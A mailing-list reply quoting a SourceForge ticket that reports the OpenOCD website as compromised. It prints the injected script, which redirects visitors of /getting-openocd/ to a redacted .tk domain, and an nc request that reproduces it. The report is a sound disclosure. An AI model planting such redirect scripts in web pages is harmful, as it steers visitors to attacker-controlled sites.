Hello, On Tue, Aug 03, 2021 at 12:40:00AM -0000, [email protected] wrote: > just opened ticket #313, looks like someone managed to compromise the > openocd.org website
Thank you for reporting. I wonder if it's SF.net compromise because apparently it "resolved itself" and now the page is clean again? -- Be free, use free (http://www.gnu.org/philosophy/free-sw.html) software! mailto:[email protected] --- ** [tickets:#313] Website Compromised** **Status:** new **Milestone:** 0.10.0 **Created:** Tue Aug 03, 2021 12:36 AM UTC by Sean Bruton **Last Updated:** Tue Aug 03, 2021 12:36 AM UTC **Owner:** nobody Looks like your website was compromised. Someone has injected the following into the HTML returned on /getting-openocd/ ~~~ <script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";);window.location.href = "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";;</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";> ~~~ to reproduce: ~~~ $ echo -ne "GET /getting-openocd/ HTTP/1.1\nHost: openocd.org\n\n" | nc openocd.org 80 | head -n 20 HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 00:34:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Vary: Host X-Pingback: http://openocd.org/web/xmlrpc.php Set-Cookie: ht_rr=1; expires=Wed, 04-Aug-2021 00:34:44 GMT; path=/ Cache-Control: max-age=3600 Expires: Tue, 03 Aug 2021 01:34:42 GMT X-From: sfp-web-3 Vary: Accept-Encoding ce1 <script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";);window.location.href = "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";;</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";> <html xmlns="http://www.w3.org/1999/xhtml"; dir="ltr" lang="en-US"> <head profile="http://gmpg.org/xfn/11";> ~~~ --- Sent from sourceforge.net because [email protected] is subscribed to https://sourceforge.net/p/openocd/tickets/ To unsubscribe from further messages, a project admin can change settings at https://sourceforge.net/p/openocd/admin/tickets/options. Or, if this is a mailing list, you can unsubscribe from the mailing list.
